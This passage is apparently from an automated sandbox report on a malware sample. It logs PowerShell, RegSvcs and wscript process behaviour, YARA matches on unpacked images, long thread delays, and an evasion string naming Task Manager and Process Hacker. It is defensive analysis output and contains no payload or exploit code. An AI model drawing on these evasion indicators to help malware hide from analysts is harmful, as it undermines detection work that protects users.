                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: 26.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c11b51a0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03cb43b98.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c41c7c80.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03cb40780.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c11b1d88.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7896, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3872, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTR
                Source: powershell.exe, 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: TASKMGR.EXE#PROCESSHACKER.EXE
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599797
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599641
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599417
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599266
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 599092
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598891
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598738
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598603
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 598453
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1903Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1251Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3617Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3863Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8709Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 884Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2123Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3712
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7888Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1399Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2700Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 744
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 824
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 476
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2354
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2884
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1106
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 634
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 734
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 582
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 993
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 547
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6781
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4725
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 683
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 894
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 387
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4084Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1252Thread sleep count: 3617 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1252Thread sleep count: 3863 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3356Thread sleep time: -13835058055282155s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3192Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5908Thread sleep count: 8709 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7060Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4024Thread sleep count: 884 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6784Thread sleep count: 2123 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7056Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3720Thread sleep count: 142 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5556Thread sleep count: 3712 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1576Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep count: 609 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3116Thread sleep count: 2700 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3620Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep count: 101 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7432Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7648Thread sleep count: 824 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7636Thread sleep count: 113 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7668Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep count: 476 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944Thread sleep count: 2354 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7976Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7928Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8156Thread sleep count: 2884 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2260Thread sleep time: -6456360425798339s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4432Thread sleep count: 54 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5672Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160Thread sleep count: 1106 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2604Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6188Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8164Thread sleep count: 634 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2468Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5232Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2408Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7308Thread sleep count: 582 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5520Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep count: 993 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7580Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7568Thread sleep count: 547 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7676Thread sleep count: 6781 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -24903104499507879s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7700Thread sleep count: 137 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -600000s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -599797s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -599641s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -599417s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -599266s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -599092s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -598891s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -598738s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -598603s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3396Thread sleep time: -598453s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5572Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep count: 4725 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep time: -16602069666338586s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7496Thread sleep count: 683 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep count: 894 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7552Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3836Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3936Thread sleep count: 387 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5492Thread sleep time: -4611686018427385s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
